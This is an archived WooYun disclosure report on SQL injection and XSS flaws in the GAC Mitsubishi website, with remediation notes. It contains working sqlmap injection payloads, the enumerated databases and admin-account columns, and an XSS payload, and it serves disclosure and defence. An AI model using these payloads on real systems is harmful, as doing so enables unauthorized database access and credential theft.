
Vulnerability summary

Defect ID: wooyun-2015-0142468

Title: SQL injection and XSS vulnerabilities on the GAC Mitsubishi official website (bundled report)

Related vendor: cncert (National Internet Emergency Center)

Author: 霝z

Submitted: 2015-09-23 21:35

Fixed: 2015-11-09 17:16

Published: 2015-11-09 17:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-23: Details sent to the vendor, awaiting vendor handling
2015-09-25: cncert (National Internet Emergency Center) has not yet been able to reach the responsible organization; details disclosed only to the reporting agency
2015-10-05: Details disclosed to core white hats and experts in related fields
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public

Brief description:

SQL+XSS

Detailed description:

1. SQL injection
2. XSS (cross-site scripting)
1. SQL injection
1.1 Injection point

GET /Ajax/CommonHandler.ashx?method=DealerInfo&CityCode=4401&Where=%27+OR+%27ns%27%3d%27ns HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://**.**.**.**/BuyTools/BuyChooses/DealerSearch?tow=
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: **.**.**.**
Cookie: ASP.NET_SessionId=tkfjxlpktswxl3cbbnhjqln3; SC_ANALYTICS_GLOBAL_COOKIE=f4b1236f12cd4844a44d5be7e0a051d7; SC_ANALYTICS_SESSION_COOKIE=E7D9D5BAF68E4D18A25EC94839FA5F00|0|tkfjxlpktswxl3cbbnhjqln3; MITSUBISHI_COOKIE={"Car":"{\"1100000501\":6}"}; \"1100000323\":1}"}=; NewsId=dbc2158a-090c-490f-9b66-346d574e3947|fa7168aa-60b3-4b10-8ea7-c49b186ee3cb|226c662d-6db8-469e-b7ce-f1eee1d6f26a|f351b356-d753-46a3-8d2e-f179fde37491|c3dcd749-e362-4add-beee-650047eaf8ee|5fe1f30c-c954-428d-9d2b-32f5e740267a|73c06fb6-2a84-4562-8341-35c5b2368cc8|2f97806f-5b19-4f98-bf38-0bfece5d539d|cf816137-b05c-4ed1-b28a-02b0dbd2587f|08c6716e-93e5-486e-868b-c598a08634e1|da49e78f-5fc9-4eb3-beaa-b452dc89cda7|67ca10f9-9e2d-48cf-a52f-5faf7aa6d80b|283a20e9-89dd-485c-b40d-eb177ca1700f; website#sc_mode=edit; shell#sc_mode=edit
Accept-Encoding: gzip, deflate


1.2 Affected databases

Place: GET
Parameter: Where
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Where=3%' AND 5562=5562 AND '%'='
Place: GET
Parameter: CityCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' AND 9587=9587 AND 'kCYY'='kCYY&Where=3
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: Where, type: Single quoted string (default)
[1] place: GET, parameter: CityCode, type: Single quoted string
[q] Quit
> 1


available databases [10]:
[*] GMMC_Extend
[*] master
[*] Mitsubishi_master
[*] Mitsubishi_WeChat
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] temp
[*] tempdb


1.3 Tables and columns

Database: Mitsubishi_WeChat
[13 tables]
+------------------------+
| dbo.Account |
| dbo.AdminAccount |
| dbo.Articles |
| dbo.AvailableFunctions |
| dbo.Exception |
| dbo.Member |
| dbo.Menus |
| dbo.Scenes |
| dbo.UrlInfo |
| dbo.UserPhones |
| dbo.[KeyWor s] |
| dbo.hn |
| dbo.urlzm |
+------------------------+
======================
Database: Mitsubishi_WeChat
Table: dbo.AdminAccount
[5 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| Account | nvarchar |
| Id | int |
| JoinTime | datetime |
| LastLogin | datetime |
| PassWord | nvarchar |
+-----------+----------+


2. XSS

http://**.**.**.**/SearchResult?keywords=<IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)>

Proof of vulnerability:

1. SQL injection

(screenshot: sales.jpg)

(screenshot: bmzd.jpg)

2. XSS

(screenshot: XSS.jpg)

Remediation:

1. Filter (validate) the input parameters
2. Likewise, filter special characters
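As an added illustration of both remediation items (example code, not from the original report or the site), the following Python stand-in mirrors the DealerInfo handler with a vulnerable and a parameterized form, plus output encoding for the reflected SearchResult keyword. The table layout, dealer names and the exact SQL shape are assumptions inferred from the sqlmap payloads above; SQLite stands in for the site's MSSQL backend so the code runs offline.

```python
import html
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the dealer lookup behind CommonHandler.ashx?method=DealerInfo.
# Table layout, dealer names and the exact SQL are assumptions; the real backend is MSSQL
# (the sqlmap output queries syscolumns), SQLite is used only so this runs offline.
SAMPLE_DEALERS = [("4401", "Dealer Guangzhou East"),
                  ("4401", "Dealer Guangzhou West"),
                  ("3101", "Dealer Shanghai")]


def _open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Dealer (CityCode TEXT, Name TEXT)")
    conn.executemany("INSERT INTO Dealer VALUES (?, ?)", SAMPLE_DEALERS)
    return conn


def _params(query_string):
    qs = parse_qs(query_string, keep_blank_values=True)
    return qs.get("CityCode", [""])[0], qs.get("Where", [""])[0]


def dealer_info_vulnerable(query_string):
    """The defect the report found: CityCode and Where are pasted into the SQL text, so a
    quote in either ends the literal and the remainder executes as SQL (boolean oracle)."""
    city, where = _params(query_string)
    sql = f"SELECT Name FROM Dealer WHERE CityCode = '{city}' AND Name LIKE '%{where}%'"
    return [name for (name,) in _open_db().execute(sql)]


def dealer_info_fixed(query_string):
    """Remediation item 1: validate CityCode against its expected shape and bind both values
    as parameters, so the keyword is matched literally and cannot alter the statement."""
    city, where = _params(query_string)
    if not (city.isdigit() and len(city) == 4):
        raise ValueError("CityCode must be a four-digit code")
    sql = "SELECT Name FROM Dealer WHERE CityCode = ? AND Name LIKE '%' || ? || '%'"
    return [name for (name,) in _open_db().execute(sql, (city, where))]


def render_search_heading(keywords):
    """Remediation item 2 for /SearchResult?keywords=...: HTML-encode the reflected term
    rather than blacklisting characters, so any markup in it is displayed, not interpreted."""
    return f"<h2>Results for {html.escape(keywords, quote=True)}</h2>"
```

Feeding the vulnerable function a true and a false condition in the Where keyword (the shape of the sqlmap payload above) returns different row counts, which is the boolean-blind oracle the report found; the parameterized version returns the same empty result for both.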

Copyright notice: when reposting, credit the source: 霝z@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-25 17:14

Vendor reply:

No direct handling channel has yet been established with the organization that operates the website; awaiting claim.

Latest status:

None

